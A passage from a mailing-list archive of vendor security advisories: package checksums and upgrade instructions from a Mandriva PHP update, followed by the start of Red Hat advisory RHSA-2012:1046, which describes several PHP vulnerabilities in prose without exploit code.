7705d28806c6a73a9e588d174203ec11 mes5/SRPMS/php-dio-0.0.5-0.1mdvmes5.2.src.rpm cb9fd58d04a1db3ceec2f9b15c5ddac0 mes5/SRPMS/php-eaccelerator-0.9.6.1-0.6mdvmes5.2.src.rpm d1e7c7da449372f62c27a0cd3eeb8a8d mes5/SRPMS/php-fam-5.0.1-3.6mdvmes5.2.src.rpm 4c10d297abc9ea2a4dfe2cc441be619c mes5/SRPMS/php-filepro-5.1.6-13.6mdvmes5.2.src.rpm 7c30fe50ac1dc23870c64660300e78f8 mes5/SRPMS/php-gtk2-2.0.1-2.2mdvmes5.2.src.rpm ecdbedc8c745921ab7e8c97850c7e976 mes5/SRPMS/php-imagick-3.0.1-0.2mdvmes5.2.src.rpm c31069ae710a67783a81adf905f72842 mes5/SRPMS/php-ini-5.3.13-0.1mdvmes5.2.src.rpm 7bba5d67278539bbfe8980f4619fc443 mes5/SRPMS/php-mailparse-2.1.6-0.1mdvmes5.2.src.rpm c064fa5008b99634cf43dd8cfcfc38a8 mes5/SRPMS/php-mcal-0.6-23.6mdvmes5.2.src.rpm 4dc1c969e13503b5b84e4cc2a62fcafa mes5/SRPMS/php-mcve-7.0.3-0.2mdvmes5.2.src.rpm 8a0b00a7eb45735c7f1b84db2124a02a mes5/SRPMS/php-mdbtools-1.0.0-4.2mdvmes5.2.src.rpm 50514e567296ef853fc9c040b27fde14 mes5/SRPMS/php-memcache-3.0.6-0.2mdvmes5.2.src.rpm 3d68803bc8d4d5db837d034e31b559ab mes5/SRPMS/php-ming-5.2.10-0.2mdvmes5.2.src.rpm 3788a033464659c7697271fe3e11cb6b mes5/SRPMS/php-optimizer-0.1-0.alpha2.0.2mdvmes5.2.src.rpm 4e41590da9fd097f6ecb0cf362bf99f9 mes5/SRPMS/php-perl-1.0.0-32.2mdvmes5.2.src.rpm 8227db814a6322c4a1c72717965be834 mes5/SRPMS/php-radius-1.2.5-7.2mdvmes5.2.src.rpm b6eea216f82a274151c12bb38e50793c mes5/SRPMS/php-sasl-0.1.0-21.6mdvmes5.2.src.rpm aefb4d8a934bd9ecf18f10cf94508b21 mes5/SRPMS/php-sphinx-1.2.0-0.1mdvmes5.2.src.rpm 27acc20ae9792b5ee79127428c76d019 mes5/SRPMS/php-ssh2-0.11.3-0.1mdvmes5.2.src.rpm 8561139b4f53146b52d0d881c93bd884 mes5/SRPMS/php-suhosin-0.9.33-0.1mdvmes5.2.src.rpm 9decd2138202b8f51428b69f8d089679 mes5/SRPMS/php-tclink-3.4.5-0.2mdvmes5.2.src.rpm a331ac0e06665fb2b1696eeb35ddd67b mes5/SRPMS/php-timezonedb-2012.3-0.1mdvmes5.2.src.rpm 79c414525991c894f01d9e597cda78f6 mes5/SRPMS/php-translit-0.6.1-0.1mdvmes5.2.src.rpm 93897f5b7d60138c9e12474dc8388954 mes5/SRPMS/php-vld-0.11.1-0.1mdvmes5.2.src.rpm 9f2b8c72495c63762e02a4792b321463 mes5/SRPMS/php-xattr-1.1.0-2.6mdvmes5.2.src.rpm bec964b1764e87c0ba2d78ec3c33f662 mes5/SRPMS/php-xcache-1.3.2-0.1mdvmes5.2.src.rpm 6e3b637199e13bd895401f2cadbf25c5 mes5/SRPMS/php-xdebug-2.1.4-0.1mdvmes5.2.src.rpm 7b1f065bc086533fa01adba07235c4fe mes5/SRPMS/php-yaz-1.1.1-0.1mdvmes5.2.src.rpm 51586ceaba69e3a61e4171c1b33821ad mes5/SRPMS/sphinx-0.9.9-0.1mdvmes5.2.src.rpm fb8632c3872b5f62b8fdc070565d21b6 mes5/SRPMS/xmlrpc-epi-0.54-0.1mdvmes5.2.src.rpm 7737d7193bce052e26930d49ee7e841f mes5/SRPMS/yaz-3.0.48-0.1mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 96b2d5df095de56795b5e402b5615e5a mes5/x86_64/apache-mod_php-5.3.13-0.1mdvmes5.2.x86_64.rpm 03641ff5a502b304b0cbdeff4161f07a mes5/x86_64/lemon-3.7.4-0.1mdvmes5.2.x86_64.rpm 16d5aee91aab749c674b146725679edf mes5/x86_64/lib64mbfl1-1.1.0-0.1mdvmes5.2.x86_64.rpm 211cf3c8c54d7135c1c59d37df63dbd9 mes5/x86_64/lib64mbfl-devel-1.1.0-0.1mdvmes5.2.x86_64.rpm ff17fd8f9ad24289e558636ce26d6e17 mes5/x86_64/lib64ming1-0.4.4-0.1mdvmes5.2.x86_64.rpm 84acf50087747dcb4f34a5aa2ea1ce0a mes5/x86_64/lib64ming-devel-0.4.4-0.1mdvmes5.2.x86_64.rpm db2510f25a007023647f235013ec6e74 mes5/x86_64/lib64monetra7-7.0.4-0.1mdvmes5.2.x86_64.rpm e449abc214208571c14827a9319c0ec3 mes5/x86_64/lib64monetra-devel-7.0.4-0.1mdvmes5.2.x86_64.rpm 7a418a728839573bca2187e8c5468fe2 mes5/x86_64/lib64php5_common5-5.3.13-0.1mdvmes5.2.x86_64.rpm 4060a9ea3f85ea3df9260575783e7a17 mes5/x86_64/lib64sphinxclient0-0.9.9-0.1mdvmes5.2.x86_64.rpm f6ca93737988ebae403ef0ed8ab41359 mes5/x86_64/lib64sphinxclient-devel-0.9.9-0.1mdvmes5.2.x86_64.rpm 4a7ef9bd46d3c4e8e36f08868319244d mes5/x86_64/lib64stemmer0-0-5.1mdvmes5.2.x86_64.rpm b15fe53cc1c6ea59fdd82c04eae8e7fd mes5/x86_64/lib64stemmer-devel-0-5.1mdvmes5.2.x86_64.rpm c673964b2561e44781a98cb86a9e3187 mes5/x86_64/lib64xmlrpc-epi0-0.54-0.1mdvmes5.2.x86_64.rpm e66b903dc4310d0d3849689529146ec3 mes5/x86_64/lib64xmlrpc-epi-devel-0.54-0.1mdvmes5.2.x86_64.rpm 49cbe05c0d48ad378bd129ebd036ba26 mes5/x86_64/lib64yaz3-3.0.48-0.1mdvmes5.2.x86_64.rpm 2afb044886e1c96c3db29bdf0bb7dc9b mes5/x86_64/lib64yaz-devel-3.0.48-0.1mdvmes5.2.x86_64.rpm 2f4b0caff3c9e97839df3aa1ad6ca732 mes5/x86_64/ming-utils-0.4.4-0.1mdvmes5.2.x86_64.rpm f288571bd192a5e5802a40cd7d4e3118 mes5/x86_64/perl-SWF-0.4.4-0.1mdvmes5.2.x86_64.rpm b059dbc18e76476659494969ef5e4947 mes5/x86_64/php-apc-3.1.10-0.1mdvmes5.2.x86_64.rpm 68149e7e29a2e2ea3f7d7e3573bd193b mes5/x86_64/php-apc-admin-3.1.10-0.1mdvmes5.2.x86_64.rpm e38d895cf490704f5e6f8b1ecdca7e61 mes5/x86_64/php-bcmath-5.3.13-0.1mdvmes5.2.x86_64.rpm 711815bad3794350d9177d52bac8d95b mes5/x86_64/php-bz2-5.3.13-0.1mdvmes5.2.x86_64.rpm 3e8c4f72f0211a797a172c7092966a46 mes5/x86_64/php-calendar-5.3.13-0.1mdvmes5.2.x86_64.rpm 51026f5c6c789d4fe07bb64f5c2a4559 mes5/x86_64/php-cgi-5.3.13-0.1mdvmes5.2.x86_64.rpm a5c4c236c80e4219e0a8e29eac78b440 mes5/x86_64/php-cli-5.3.13-0.1mdvmes5.2.x86_64.rpm f7d68cdc91a5d1aca630bf5d2cc027a8 mes5/x86_64/php-ctype-5.3.13-0.1mdvmes5.2.x86_64.rpm 1e82cf4c1d05409239f773c27f25e148 mes5/x86_64/php-curl-5.3.13-0.1mdvmes5.2.x86_64.rpm 4414697431b4f9d8347d368406a74792 mes5/x86_64/php-dba-5.3.13-0.1mdvmes5.2.x86_64.rpm 78a159ea14c942e6b1484d7f7a02430f mes5/x86_64/php-dbx-1.1.0-30.2mdvmes5.2.x86_64.rpm afce38f700de1511605177aaac2a4b0c mes5/x86_64/php-devel-5.3.13-0.1mdvmes5.2.x86_64.rpm 24c2440bccc5cdceb6d9c6eb6fbd8fb6 mes5/x86_64/php-dio-0.0.5-0.1mdvmes5.2.x86_64.rpm e304390a900576e6344b831935fca984 mes5/x86_64/php-doc-5.3.13-0.1mdvmes5.2.x86_64.rpm 41d2f61596375aa03dcd64462432b8ad mes5/x86_64/php-dom-5.3.13-0.1mdvmes5.2.x86_64.rpm 84eead8c2a272ed05ef0a8f3b6672f56 mes5/x86_64/php-eaccelerator-0.9.6.1-0.6mdvmes5.2.x86_64.rpm d72cfcdee8d186ad859b3b99fd70bdd0 mes5/x86_64/php-eaccelerator-admin-0.9.6.1-0.6mdvmes5.2.x86_64.rpm e3b9b291bbc15d61895e27372b8b1925 mes5/x86_64/php-enchant-5.3.13-0.1mdvmes5.2.x86_64.rpm 558cd9c98631858a661a6aa4ccdf882b mes5/x86_64/php-exif-5.3.13-0.1mdvmes5.2.x86_64.rpm 3553939609e3fef1652ee999d37fd530 mes5/x86_64/php-fam-5.0.1-3.6mdvmes5.2.x86_64.rpm 5a19e0b3fc58299ccdb1b12f5ca69200 mes5/x86_64/php-fileinfo-5.3.13-0.1mdvmes5.2.x86_64.rpm 8a23bbc3e8c9ef45a339563075668d59 mes5/x86_64/php-filepro-5.1.6-13.6mdvmes5.2.x86_64.rpm 78be28f1fee69306797aa83a91bee75b mes5/x86_64/php-filter-5.3.13-0.1mdvmes5.2.x86_64.rpm f8339f10b4664c2130f1159f89c0b244 mes5/x86_64/php-fpm-5.3.13-0.1mdvmes5.2.x86_64.rpm d3b287afef7b1f6207082e97ae77b349 mes5/x86_64/php-ftp-5.3.13-0.1mdvmes5.2.x86_64.rpm 98f68dcc439e4252d72be221fe1e9b98 mes5/x86_64/php-gd-5.3.13-0.1mdvmes5.2.x86_64.rpm 0d04cfba60b215c27a87d77a363a51e9 mes5/x86_64/php-gettext-5.3.13-0.1mdvmes5.2.x86_64.rpm f95a838116143b396aedeeb01c534584 mes5/x86_64/php-gmp-5.3.13-0.1mdvmes5.2.x86_64.rpm e84018d144e7f94e436132420d51440d mes5/x86_64/php-gtk2-2.0.1-2.2mdvmes5.2.x86_64.rpm 7e02ce03f990c677fd39095d094bf5fc mes5/x86_64/php-hash-5.3.13-0.1mdvmes5.2.x86_64.rpm 9e3ae7e6d67397fc15a81d3b3e7d30c8 mes5/x86_64/php-iconv-5.3.13-0.1mdvmes5.2.x86_64.rpm 76155d4adcfb84852c193a6a9183a701 mes5/x86_64/php-imagick-3.0.1-0.2mdvmes5.2.x86_64.rpm 6c1aa64a78fef0ba6b12de5c7fdf227e mes5/x86_64/php-imap-5.3.13-0.1mdvmes5.2.x86_64.rpm e9dbcfb8b6330f52ea6f83630e0b96db mes5/x86_64/php-ini-5.3.13-0.1mdvmes5.2.x86_64.rpm a99ae1adc279e1446501374b396e9194 mes5/x86_64/php-intl-5.3.13-0.1mdvmes5.2.x86_64.rpm c4856a889eb1fabe4cfb4e7e0541a208 mes5/x86_64/php-json-5.3.13-0.1mdvmes5.2.x86_64.rpm 1e6ed1c6f514d3bed9271e192d6b8c79 mes5/x86_64/php-ldap-5.3.13-0.1mdvmes5.2.x86_64.rpm 23d141eeb5ec49b7bd14931e313efe61 mes5/x86_64/php-mailparse-2.1.6-0.1mdvmes5.2.x86_64.rpm 67df3a26f6e25258bb28b9d70ebdc7b9 mes5/x86_64/php-mbstring-5.3.13-0.1mdvmes5.2.x86_64.rpm ce6ec0bd9bf2c6bbea51b670566cf125 mes5/x86_64/php-mcal-0.6-23.6mdvmes5.2.x86_64.rpm 3af3a06df5a30d2324b42ce38b0170c7 mes5/x86_64/php-mcrypt-5.3.13-0.1mdvmes5.2.x86_64.rpm 898c0ff97086e4003f34c5af21a1209b mes5/x86_64/php-mcve-7.0.3-0.2mdvmes5.2.x86_64.rpm ea3c678599dd676b1596cf9b38bac5fa mes5/x86_64/php-mdbtools-1.0.0-4.2mdvmes5.2.x86_64.rpm f42a0499caae118ccb02a404fe853e8d mes5/x86_64/php-memcache-3.0.6-0.2mdvmes5.2.x86_64.rpm d656bf501e02bf270c74e621655e0f79 mes5/x86_64/php-ming-5.2.10-0.2mdvmes5.2.x86_64.rpm 67182e137d6799e21d1eb95f8e8a09a6 mes5/x86_64/php-mssql-5.3.13-0.1mdvmes5.2.x86_64.rpm 13b16b807e73dc799f820ec360b4c4c4 mes5/x86_64/php-mysql-5.3.13-0.1mdvmes5.2.x86_64.rpm 401bf41f8ae42e1c5cbae844b5859310 mes5/x86_64/php-mysqli-5.3.13-0.1mdvmes5.2.x86_64.rpm a3d71aca0b59a479be67aa5f7e2dadac mes5/x86_64/php-mysqlnd-5.3.13-0.1mdvmes5.2.x86_64.rpm 299a5af759216cc02b72c73e1aedb898 mes5/x86_64/php-odbc-5.3.13-0.1mdvmes5.2.x86_64.rpm 1b9afd33db663c3c0376e9e366a1d7e9 mes5/x86_64/php-openssl-5.3.13-0.1mdvmes5.2.x86_64.rpm 1bfa8188adf02eefd1fee6980bf8a637 mes5/x86_64/php-optimizer-0.1-0.alpha2.0.2mdvmes5.2.x86_64.rpm 4ea6deefc1d6c98165a39bf0cbbb1e68 mes5/x86_64/php-pcntl-5.3.13-0.1mdvmes5.2.x86_64.rpm e8edc47c4535c7185c648fe2cdd62fd3 mes5/x86_64/php-pdo-5.3.13-0.1mdvmes5.2.x86_64.rpm 7de9187f26e2b1dcbde7bfa6b5e72cc3 mes5/x86_64/php-pdo_dblib-5.3.13-0.1mdvmes5.2.x86_64.rpm 43c1dabc4e916f1676a64affa4e71923 mes5/x86_64/php-pdo_mysql-5.3.13-0.1mdvmes5.2.x86_64.rpm 90e7bb6c5edceae816e1efc1d772c1cd mes5/x86_64/php-pdo_odbc-5.3.13-0.1mdvmes5.2.x86_64.rpm 41c159cea72f2c8608422dd60b24a2aa mes5/x86_64/php-pdo_pgsql-5.3.13-0.1mdvmes5.2.x86_64.rpm 3b806d521833732f44d199760894e6cc mes5/x86_64/php-pdo_sqlite-5.3.13-0.1mdvmes5.2.x86_64.rpm e3047e894435230a2234b6c106e7f85b mes5/x86_64/php-perl-1.0.0-32.2mdvmes5.2.x86_64.rpm 13e2506c835e395eb7f81edac6b61a8f mes5/x86_64/php-pgsql-5.3.13-0.1mdvmes5.2.x86_64.rpm dab84434950d74f298b66066fc5d22b2 mes5/x86_64/php-phar-5.3.13-0.1mdvmes5.2.x86_64.rpm c087bf52f652c59da6bdd4fb06286464 mes5/x86_64/php-posix-5.3.13-0.1mdvmes5.2.x86_64.rpm 29d9820c941b281ec4bf2e1ae154b590 mes5/x86_64/php-pspell-5.3.13-0.1mdvmes5.2.x86_64.rpm 2a5472038518e78b1e77c085486a7f41 mes5/x86_64/php-radius-1.2.5-7.2mdvmes5.2.x86_64.rpm ef96d7846f36e03abbe0389a9c7025a6 mes5/x86_64/php-readline-5.3.13-0.1mdvmes5.2.x86_64.rpm 3d6dc5bbe9f83a3b7379b09842418d6d mes5/x86_64/php-recode-5.3.13-0.1mdvmes5.2.x86_64.rpm fe9478b8ef31ffd03c4fd7e3b13a6fcd mes5/x86_64/php-sasl-0.1.0-21.6mdvmes5.2.x86_64.rpm 66ea22c633fb484f787795c541c31458 mes5/x86_64/php-session-5.3.13-0.1mdvmes5.2.x86_64.rpm 73cf8b14818d6c4aa6ff7b4f876a305f mes5/x86_64/php-shmop-5.3.13-0.1mdvmes5.2.x86_64.rpm 2f1c10a3e69bc4962c68da8494d7a2d1 mes5/x86_64/php-snmp-5.3.13-0.1mdvmes5.2.x86_64.rpm 66bf34f4665ce04daf5962c4c5178966 mes5/x86_64/php-soap-5.3.13-0.1mdvmes5.2.x86_64.rpm d9f0deeb70efb200c65be5ba2cbfe197 mes5/x86_64/php-sockets-5.3.13-0.1mdvmes5.2.x86_64.rpm cb5ace43e37f4488ca65e4740495842a mes5/x86_64/php-sphinx-1.2.0-0.1mdvmes5.2.x86_64.rpm d2347f18673adf71d3fdc94600e6ec77 mes5/x86_64/php-sqlite3-5.3.13-0.1mdvmes5.2.x86_64.rpm 5317fd6819706540ee1d1e209b0ee65d mes5/x86_64/php-sqlite-5.3.13-0.1mdvmes5.2.x86_64.rpm e308fc3349779514b7aa1e336452f539 mes5/x86_64/php-ssh2-0.11.3-0.1mdvmes5.2.x86_64.rpm c60c35039cdf4a3446e29d0dfa96bc40 mes5/x86_64/php-suhosin-0.9.33-0.1mdvmes5.2.x86_64.rpm 3076e178dff5d37d8c44f21e00d63c9e mes5/x86_64/php-sybase_ct-5.3.13-0.1mdvmes5.2.x86_64.rpm e268581c1bbbd9269faa591577fce62a mes5/x86_64/php-sysvmsg-5.3.13-0.1mdvmes5.2.x86_64.rpm 7dbc04b5fc2ffee323f2c4123feb05bd mes5/x86_64/php-sysvsem-5.3.13-0.1mdvmes5.2.x86_64.rpm 1bdffd99b577b97adc67e5b20df0b301 mes5/x86_64/php-sysvshm-5.3.13-0.1mdvmes5.2.x86_64.rpm 71043e5371ce75f9f0cb63df38021fdb mes5/x86_64/php-tclink-3.4.5-0.2mdvmes5.2.x86_64.rpm 215a92aa7004ea738f44aed3e1168b9c mes5/x86_64/php-tidy-5.3.13-0.1mdvmes5.2.x86_64.rpm efc0a9750197c1b1f5158c8c1e55c27b mes5/x86_64/php-timezonedb-2012.3-0.1mdvmes5.2.x86_64.rpm c7debf59191371056785b18a4a99c276 mes5/x86_64/php-tokenizer-5.3.13-0.1mdvmes5.2.x86_64.rpm 26be1bde74ac0ce9f0b442cb4c81a9be mes5/x86_64/php-translit-0.6.1-0.1mdvmes5.2.x86_64.rpm c99427fc99b451727ac42a9b96a5537c mes5/x86_64/php-vld-0.11.1-0.1mdvmes5.2.x86_64.rpm 2743db76a4ec5fd0a67dbd68bf1229a4 mes5/x86_64/php-wddx-5.3.13-0.1mdvmes5.2.x86_64.rpm 6af7e7503ffe3d4141f222fb0701e817 mes5/x86_64/php-xattr-1.1.0-2.6mdvmes5.2.x86_64.rpm 85f807ce183c7b843701fd8899ef0991 mes5/x86_64/php-xcache-1.3.2-0.1mdvmes5.2.x86_64.rpm a62dad29f5eade1f3d3864b25dff3f2d mes5/x86_64/php-xcache-admin-1.3.2-0.1mdvmes5.2.x86_64.rpm bbf6d7585d06df26bcfa3b73dab0007c mes5/x86_64/php-xdebug-2.1.4-0.1mdvmes5.2.x86_64.rpm a5f092be6c7ca43ad60913afb67885e6 mes5/x86_64/php-xml-5.3.13-0.1mdvmes5.2.x86_64.rpm 65ef3be867bd8427c1f5d41131de8249 mes5/x86_64/php-xmlreader-5.3.13-0.1mdvmes5.2.x86_64.rpm d0c2192b6b08ef59e912fcbd272c98be mes5/x86_64/php-xmlrpc-5.3.13-0.1mdvmes5.2.x86_64.rpm 1c529b0215628a4d699542742dddb80e mes5/x86_64/php-xmlwriter-5.3.13-0.1mdvmes5.2.x86_64.rpm 78df5fc0a2128aa9658b426cd8378b35 mes5/x86_64/php-xsl-5.3.13-0.1mdvmes5.2.x86_64.rpm dadfa8975b5a1a141b2f454d370c59f6 mes5/x86_64/php-yaz-1.1.1-0.1mdvmes5.2.x86_64.rpm 9caa5cd5185ae316a091de219fd984d9 mes5/x86_64/php-zip-5.3.13-0.1mdvmes5.2.x86_64.rpm 92ac01caa79c1d542fe06e4aae21ff0b mes5/x86_64/php-zlib-5.3.13-0.1mdvmes5.2.x86_64.rpm fb2eadb2172166381d594394916add79 mes5/x86_64/python-SWF-0.4.4-0.1mdvmes5.2.x86_64.rpm 5fdd248cb611e7997ddc828e8a90c043 mes5/x86_64/sphinx-0.9.9-0.1mdvmes5.2.x86_64.rpm b3d72ab63f47dd5a0f3b1f147321bcab mes5/x86_64/stemwords-0-5.1mdvmes5.2.x86_64.rpm cfada59c5348ee46e44202376cf042c5 mes5/x86_64/yaz-3.0.48-0.1mdvmes5.2.x86_64.rpm 2bac0388ad669fc836a910cb6919733e mes5/SRPMS/apache-mod_php-5.3.13-0.1mdvmes5.2.src.rpm 0dd8c597a6a39e17b504408fa4f894d1 mes5/SRPMS/lemon-3.7.4-0.1mdvmes5.2.src.rpm 04a50458044ddef8dca4acbecd0555d1 mes5/SRPMS/libmbfl-1.1.0-0.1mdvmes5.2.src.rpm d9e473396af964f01dd6310844925396 mes5/SRPMS/libmonetra-7.0.4-0.1mdvmes5.2.src.rpm 0fafe53fccc11afa4b75c66dc49261cd mes5/SRPMS/libstemmer-0-5.1mdvmes5.2.src.rpm 6de1878b7ff4fbc0b63e381618e966ba mes5/SRPMS/ming-0.4.4-0.1mdvmes5.2.src.rpm c4041cade9aaf6c4c67f046e4bfbaa74 mes5/SRPMS/php-5.3.13-0.1mdvmes5.2.src.rpm c0a1c69bca172f69a034505cfd6b37fc mes5/SRPMS/php-apc-3.1.10-0.1mdvmes5.2.src.rpm df8c3520a450cb4209179f60cf8828cd mes5/SRPMS/php-dbx-1.1.0-30.2mdvmes5.2.src.rpm 7705d28806c6a73a9e588d174203ec11 mes5/SRPMS/php-dio-0.0.5-0.1mdvmes5.2.src.rpm cb9fd58d04a1db3ceec2f9b15c5ddac0 mes5/SRPMS/php-eaccelerator-0.9.6.1-0.6mdvmes5.2.src.rpm d1e7c7da449372f62c27a0cd3eeb8a8d mes5/SRPMS/php-fam-5.0.1-3.6mdvmes5.2.src.rpm 4c10d297abc9ea2a4dfe2cc441be619c mes5/SRPMS/php-filepro-5.1.6-13.6mdvmes5.2.src.rpm 7c30fe50ac1dc23870c64660300e78f8 mes5/SRPMS/php-gtk2-2.0.1-2.2mdvmes5.2.src.rpm ecdbedc8c745921ab7e8c97850c7e976 mes5/SRPMS/php-imagick-3.0.1-0.2mdvmes5.2.src.rpm c31069ae710a67783a81adf905f72842 mes5/SRPMS/php-ini-5.3.13-0.1mdvmes5.2.src.rpm 7bba5d67278539bbfe8980f4619fc443 mes5/SRPMS/php-mailparse-2.1.6-0.1mdvmes5.2.src.rpm c064fa5008b99634cf43dd8cfcfc38a8 mes5/SRPMS/php-mcal-0.6-23.6mdvmes5.2.src.rpm 4dc1c969e13503b5b84e4cc2a62fcafa mes5/SRPMS/php-mcve-7.0.3-0.2mdvmes5.2.src.rpm 8a0b00a7eb45735c7f1b84db2124a02a mes5/SRPMS/php-mdbtools-1.0.0-4.2mdvmes5.2.src.rpm 50514e567296ef853fc9c040b27fde14 mes5/SRPMS/php-memcache-3.0.6-0.2mdvmes5.2.src.rpm 3d68803bc8d4d5db837d034e31b559ab mes5/SRPMS/php-ming-5.2.10-0.2mdvmes5.2.src.rpm 3788a033464659c7697271fe3e11cb6b mes5/SRPMS/php-optimizer-0.1-0.alpha2.0.2mdvmes5.2.src.rpm 4e41590da9fd097f6ecb0cf362bf99f9 mes5/SRPMS/php-perl-1.0.0-32.2mdvmes5.2.src.rpm 8227db814a6322c4a1c72717965be834 mes5/SRPMS/php-radius-1.2.5-7.2mdvmes5.2.src.rpm b6eea216f82a274151c12bb38e50793c mes5/SRPMS/php-sasl-0.1.0-21.6mdvmes5.2.src.rpm aefb4d8a934bd9ecf18f10cf94508b21 mes5/SRPMS/php-sphinx-1.2.0-0.1mdvmes5.2.src.rpm 27acc20ae9792b5ee79127428c76d019 mes5/SRPMS/php-ssh2-0.11.3-0.1mdvmes5.2.src.rpm 8561139b4f53146b52d0d881c93bd884 mes5/SRPMS/php-suhosin-0.9.33-0.1mdvmes5.2.src.rpm 9decd2138202b8f51428b69f8d089679 mes5/SRPMS/php-tclink-3.4.5-0.2mdvmes5.2.src.rpm a331ac0e06665fb2b1696eeb35ddd67b mes5/SRPMS/php-timezonedb-2012.3-0.1mdvmes5.2.src.rpm 79c414525991c894f01d9e597cda78f6 mes5/SRPMS/php-translit-0.6.1-0.1mdvmes5.2.src.rpm 93897f5b7d60138c9e12474dc8388954 mes5/SRPMS/php-vld-0.11.1-0.1mdvmes5.2.src.rpm 9f2b8c72495c63762e02a4792b321463 mes5/SRPMS/php-xattr-1.1.0-2.6mdvmes5.2.src.rpm bec964b1764e87c0ba2d78ec3c33f662 mes5/SRPMS/php-xcache-1.3.2-0.1mdvmes5.2.src.rpm 6e3b637199e13bd895401f2cadbf25c5 mes5/SRPMS/php-xdebug-2.1.4-0.1mdvmes5.2.src.rpm 7b1f065bc086533fa01adba07235c4fe mes5/SRPMS/php-yaz-1.1.1-0.1mdvmes5.2.src.rpm 51586ceaba69e3a61e4171c1b33821ad mes5/SRPMS/sphinx-0.9.9-0.1mdvmes5.2.src.rpm fb8632c3872b5f62b8fdc070565d21b6 mes5/SRPMS/xmlrpc-epi-0.54-0.1mdvmes5.2.src.rpm 7737d7193bce052e26930d49ee7e841f mes5/SRPMS/yaz-3.0.48-0.1mdvmes5.2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFPq6gTmqjQ0CJFipgRAqvVAJ9zEwWjj1SD2W0x+6Nb/vNvjYO4oQCg6O6L wF916W6TuFcSv/gD10fMyoE= =Va72 -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: php security update Advisory ID: RHSA-2012:1046-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-1046.html Issue date: 2012-06-27 CVE Names: CVE-2010-2950 CVE-2011-4153 CVE-2012-0057 CVE-2012-0781 CVE-2012-0789 CVE-2012-1172 CVE-2012-2143 CVE-2012-2336 CVE-2012-2386 ===================================================================== 1. Summary: Updated php packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 3. Description: PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. It was discovered that the PHP XSL extension did not restrict the file writing capability of libxslt. A remote attacker could use this flaw to create or overwrite an arbitrary file that is writable by the user running PHP, if a PHP script processed untrusted eXtensible Style Sheet Language Transformations (XSLT) content. (CVE-2012-0057) Note: This update disables file writing by default. A new PHP configuration directive, "xsl.security_prefs", can be used to enable file writing in XSLT. A flaw was found in the way PHP validated file names in file upload requests. A remote attacker could possibly use this flaw to bypass the sanitization of the uploaded file names, and cause a PHP script to store the uploaded file in an unexpected directory, by using a directory traversal attack. (CVE-2012-1172) Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way the PHP phar extension processed certain fields of tar archive files. A remote attacker could provide a specially-crafted tar archive file that, when processed by a PHP application using the phar extension, could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running PHP. (CVE-2012-2386) A format string flaw was found in the way the PHP phar extension processed certain PHAR files. A remote attacker could provide a specially-crafted PHAR file, which once processed in a PHP application using the phar extension, could lead to information disclosure and possibly arbitrary code execution via a crafted phar:// URI. (CVE-2010-2950) A flaw was found in the DES algorithm implementation in the crypt() password hashing function in PHP. If the password string to be hashed contained certain characters, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength. (CVE-2012-2143) Note: With this update, passwords are no longer truncated when performing DES hashing. Therefore, new hashes of the affected passwords will not match stored hashes generated using vulnerable PHP versions, and will need to be updated. It was discovered that the fix for CVE-2012-1823, released via RHSA-2012:0546, did not properly filter all php-cgi command line arguments. A specially-crafted request to a PHP script could cause the PHP interpreter to execute the script in a loop, or output usage information that triggers an Internal Server Error. (CVE-2012-2336) A memory leak flaw was found in the PHP strtotime() function call. A remote attacker could possibly use this flaw to cause excessive memory consumption by triggering many strtotime() function calls. (CVE-2012-0789) A NULL pointer dereference flaw was found in the PHP tidy_diagnose() function. A remote attacker could use specially-crafted input to crash an application that uses tidy::diagnose. (CVE-2012-0781) It was found that PHP did not check the zend_strndup() function's return value in certain cases. A remote attacker could possibly use this flaw to crash a PHP application. (CVE-2011-4153) Upstream acknowledges Rubin Xu and Joseph Bonneau as the original reporters of CVE-2012-2143. All php users should upgrade to these updated packages, which contain backported patches to resolve these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258 5. Bugs fixed (http://bugzilla.redhat.com/): 782657 - CVE-2012-0057 php: XSLT file writing vulnerability 782943 - CVE-2011-4153 php: zend_strndup() NULL pointer dereference may cause DoS 782951 - CVE-2012-0781 php: tidy_diagnose() NULL pointer dereference may cause DoS 783609 - CVE-2012-0789 php: strtotime timezone memory leak 799187 - CVE-2012-1172 php: $_FILES array indexes corruption 816956 - CVE-2012-2143 BSD crypt(): DES encrypted password weakness 820708 - CVE-2012-2336 php: incomplete CVE-2012-1823 fix - missing filtering of -T and -h 823594 - CVE-2012-2386 php: Integer overflow leading to heap-buffer overflow in the Phar extension 835024 - 